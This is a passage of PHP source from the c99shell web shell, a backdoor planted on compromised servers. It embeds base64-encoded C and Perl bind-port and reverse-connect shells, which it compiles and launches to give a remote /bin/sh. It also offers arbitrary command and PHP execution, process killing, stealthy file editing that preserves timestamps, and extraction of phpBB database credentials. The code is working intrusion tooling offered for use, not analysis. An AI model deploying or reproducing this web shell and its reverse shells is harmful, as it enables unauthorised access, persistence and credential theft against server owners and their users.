+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5". +"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N". +"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy". +"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1". +"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f". +"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p". +"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm". +"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi". +"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl". +"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h". +"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN". +"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy". +"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp". +"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN". +"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K". +"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg". +"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g". +"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy". +"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K". +"fQ==", + +"c99sh_backconn.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ". +"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ". +"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ". +"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L". +"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd". +"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka". +"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO". +"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR". +"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK". +"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==", + +"c99sh_backconn.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l". +"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk". +"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk". +"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g". +"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh". +"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy". +"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg". +"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1". +"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0". +"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo". +"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi". +"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==" +); + + $bndportsrcs = array( +"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), +"c99sh_bindport.c"=>array("Using C","%path %port %pass") +); + + $bcsrcs = array( +"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), +"c99sh_backconn.c"=>array("Using C","%path %host %port") +); + + if ($win) {echo "Binding port and Back connect:
    This functions not work in Windows!

    ";} + else + { + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;} + if (empty($bind[pass])) {$bind[pass] = $bindport_pass;} + if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;} + if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind[src]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$bind[src]; + $w = explode(".",$bind[src]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind[port],$v[1]); + $v[1] = str_replace("%pass",$bind[pass],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); //Timeout + $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".$SERVER_ADDR.":".$bind[port]."! You should use NetCat©, run \"nc -v ".$SERVER_ADDR." ".$bind[port]."\"!
    View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc[src]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $srcpath = $tmpdir.$bc[src]; + $w = explode(".",$bc[src]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc[host],$v[1]); + $v[1] = str_replace("%port",$bc[port],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".$bc[host].":".$bc[port]."...
    "; + } + } + } + ?>Binding port:
    Port:  Password:   
    +Back connection:
    HOST:  Port:   
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p <port>"!Result of execution this command    :
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + myshellexec($cmd); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($cmd_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret;} + } + else + { + if ($cmd_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "


     Display in text-area 
    "; +} +if ($act == "ps_aux") +{ + echo "Processes:
    "; + if ($win) {echo "This function not work in Windows!

    ";} + else + { + if ($pid) + { + if (!$sig) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + $ret = posix_kill($pid,$sig); + if ($ret) {echo "ok. he is dead, amen.";} + else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "Can't execute \"ps -aux\"!";} + else + { + $ret = htmlspecialchars($ret); + $ret = str_replace(" "," ",$ret); + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $prcs = explode("\n",$ret); + $head = explode(" ",$prcs[0]); + $head[] = "ACTION"; + unset($prcs[0]); + echo ""; + echo ""; + foreach ($head as $v) {echo "";} + echo ""; + foreach ($prcs as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "KILL"; + foreach ($line as $v) {echo "";} + echo ""; + } + } + echo "
       ".$v."   
       ".$v."   
    "; + } + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret;} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + $r = @file_get_contents($d.$f); + if (!is_readable($d.$f) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( +array("","info"), +array("","html"), +array("","txt"), +array("Code","code"), +array("Session","phpsess"), +array("","exe"), +array("SDB","sdb"), +array("","img"), +array("","ini"), +array("","download"), +array("","notepad"), +array("","edit") +); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      "; + if (is_writable($d.$f)) {echo "full read/write access (".view_perms(fileperms($d.$f)).")";} + else {echo "Read-Only (".view_perms(fileperms($d.$f)).")";} + echo "
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else + { + echo " ".$t[0].""; + } + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + echo ""; + echo ""; + echo ""; + if (!$win) + { + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $tmp=posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." "; + $tmp=posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; + } + echo "
    Perms"; + + if (is_writable($d.$f)) + { + echo "".view_perms(fileperms($d.$f)).""; + } + else + { + echo "".view_perms(fileperms($d.$f)).""; + } + + echo "
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + + + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) + { + echo "FULL HEXDUMP"; + $str=fread($fi,filesize($d.$f)); + } + else + { + echo "HEXDUMP PREVIEW"; + $str=fread($fi,$hexdump_lines*$hexdump_rows); + } + $n=0; + $a0="00000000
    "; + $a1=""; + $a2=""; + for ($i=0; $i";} + $a1.="
    "; + $a2.="
    "; + } + } + //if ($a1!="") {$a0.=sprintf("%08X",$i)."
    ";} + echo "
    $a0". + "$a1$a2

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode($r); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode($r)); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode($r); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +     [Encode + [+chunk + [+chunk+quotes + [Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {exit;} + } + elseif ($ft == "txt") + { + echo "

    ".htmlspecialchars($r)."
    "; + } + elseif ($ft == "ini") + { + echo "
    ";
+   var_dump(parse_ini_file($d.$f,true));
+   echo "
    "; + } + elseif ($ft == "phpsess") + { + echo "
    ";
+   $v = explode("|",$r);
+   echo $v[0]."
    ";
+   var_dump(unserialize($v[1]));
+   echo "
    "; + } + elseif ($ft == "exe") + { + echo "
     
    "; + } + elseif ($ft == "sdb") + { + echo "
    ";
+   var_dump(unserialize(base64_decode($r)));
+   echo "
    "; + } + elseif ($ft == "code") + { + if (ereg("phpBB 2.(.*) auto-generated config file",$r)) + { + $arr = explode(" +",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";} + echo "Parameters for manual connect:
    "; + $cfgvars = array( + "dbms"=>$dbms, + "dbhost"=>$dbhost, + "dbname"=>$dbname, + "dbuser"=>$dbuser, + "dbpasswd"=>$dbpasswd + ); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + + echo "    "; + echo "
    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + if ($rehtml) {$r = rehtmlspecialchars($r);} + $r = stripslashes($r); + $strip = false; + if(!strpos($r,""; $r = trim($r); $strip = true;} + $r = @highlight_string($r, TRUE); + if ($delspace) {$buffer = str_replace (" ", " ", $r);} + echo $r; + if (!empty($white)) {exit;} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: c99shell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo($r); + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + if (!$white) + { + echo "
    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: image/gif"); + echo($r); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$nfcontent); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $nfcontent; + } + } + $rows = count(explode(" +",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +if ($act == "phpinfo") +{ + ob_end_clean(); + phpinfo(); + exit; +} +} $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPC9iPjwvY2VudGVyPiDA4vLu8CDi+/Dg5uDl8iDh6+Dj7uTg8O3u8fL8IO7k7e7s8yDv8O7i8yDq7vLu8PvpIO7y6uv+9+jrIOXj7iDt4CDs5fH/9iDu8iDo7eXy4Cwg5OXr7iDh++vuIOLl9+Xw7uwg6CDk5evg8vwg4fvr7iDt5ffl4+4gOykgz+7k8u7r6u3z6+Ag6iDt4O/o8eDt6P4g8erz6uAg6CDs7v8g7/Do8O7k7eD/IOvl7fwgOik8Y2VudGVyPjxiPs/w4OLo6+A8L2I+OjwvY2VudGVyPiA8Yj7C+yDs7ubl8uUg6Ofs5e3/8vwg7/Du4/Dg7OzzIO/uIMLg+OXs8yDz8ezu8vDl7ej+LCDs5e3/8vwg7eDx8vDu6eroLCDk6Ofg6e0uLi4g7e4g5fHr6CDC+ywg8+Lg5uDl7PvpLCDz5". "ODr6PLlIOjr6CDy5ewg4e7r5eUg6Ofs5e3o8uUg6u7v6PDg6fL7LCDy7iD/IOHz5PMg4vvt8+bk5e0g7vLu8OLg8vwg4uDsIP/p9uAuIDwvYj48YnI+wOLy7vAg7eUg7eXxuPIg7vLi5fLx8uLl7e3u8fLoIOfgIOLu5+zu5u376SDi8OXkIO3g7eXt5e376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u"); +if ($act == "img") +{ + @ob_clean(); + + $arrimg = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC". +"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==", +"edit"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 